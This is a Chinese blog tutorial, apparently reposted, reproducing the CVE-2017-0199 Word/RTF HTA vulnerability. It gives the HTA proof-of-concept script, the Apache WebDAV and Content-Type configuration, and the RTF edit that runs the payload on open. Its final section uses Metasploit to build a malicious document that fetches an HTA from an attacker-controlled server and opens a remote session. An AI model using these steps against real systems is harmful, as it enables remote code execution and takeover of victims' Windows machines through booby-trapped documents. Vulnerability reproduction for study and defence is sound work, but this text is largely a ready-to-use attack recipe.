内容简介:CVE-2017-0199漏洞复现过程
一台apache服务器(这里我用Kali)、POC和一个Word文档。
POC内容大概如下:
<script> a=new ActiveXObject("WScript.Shell"); a.run('%windir%\\System32\\cmd.exe /c calc.exe', 0);window.close(); </script>
Word文档内容任意。
然后将其放在Kali服务器上
Apache需要开启DAV支持,具体命令如下
a2enmod dav a2enmod dav_fs a2enmod dav_lock a2enmod headers
测试过程
在web目录新建ms文件夹,将test.docx复制到ms目录下,并重命名为test.rtf
root@kali:~/Documents# cp test.docx /var/www/html/ms/test.rtf
新建Word文档,插入对象
如图
并保存为rtf文件,如233.rtf
删除服务器上的test.rtf文件
并将poc.hta文件复制到ms目录下,并改名为test.rtf
root@kali:/var/www/html/ms# rm -rf test.rtf root@kali:~/Documents# cp poc.hta /var/www/html/ms/test.rtf
修改Apache配置
<Directory /> Dav on </Directory> <Directory /var/www/html/ms/> Header set Content-Type "application/hta" </Directory>
并重启服务器 service apache2 restart
打开233.rtf文档
双击word文档的文字,将会有惊喜弹出
打开文档就弹出的话需要将 \object\objautlink\rsltpict
修改为
\object\objautlink\objupdate\rsltpict
再次打开文件
彩蛋(MSF下的实现)
在kali下执行。
首先更新msf到最新。(假设你们都完成了这个过程)
下载利用脚本
root@kali:/usr/share/metasploit-framework/modules/exploits/windows/fileformat# wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/modules/exploits/windows/fileformat/office_word_hta.rb
然后msf下执行命令 reload_all
重新加载模块
下载rtf文件到 /usr/share/metasploit-framework/data/exploits
目录
cd /usr/share/metasploit-framework/data/exploits wget https://raw.githubusercontent.com/nixawk/metasploit-framework/3d082814cbedc065f329498b9c6fb7951f8ebbd5/data/exploits/cve-2017-0199.rtf
开启hta服务
msf > use exploit/windows/misc/hta_server msf exploit(hta_server) > show options msf exploit(hta_server) > run
生成exploit文档
msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta msf exploit(office_word_hta) > show options msf exploit(office_word_hta) > set TARGETURI http://192.168.232.134:8080/4Jmy4cmcZZV7pwi.hta msf exploit(office_word_hta) > set FILENAME msf.doc msf exploit(office_word_hta) > run
将生成的msf.doc文件复制到windows上,打开即可获取一个会话
如下所示
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 【漏洞复现】WordPress插件Quizlord 2.0 XSS漏洞复现与分析
- CVE-2010-3333漏洞复现
- CVE-2017-12149漏洞复现
- WinRAR 代码执行漏洞复现
- CVE-2017-12615漏洞复现
- 越权操作漏洞的思考与复现
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。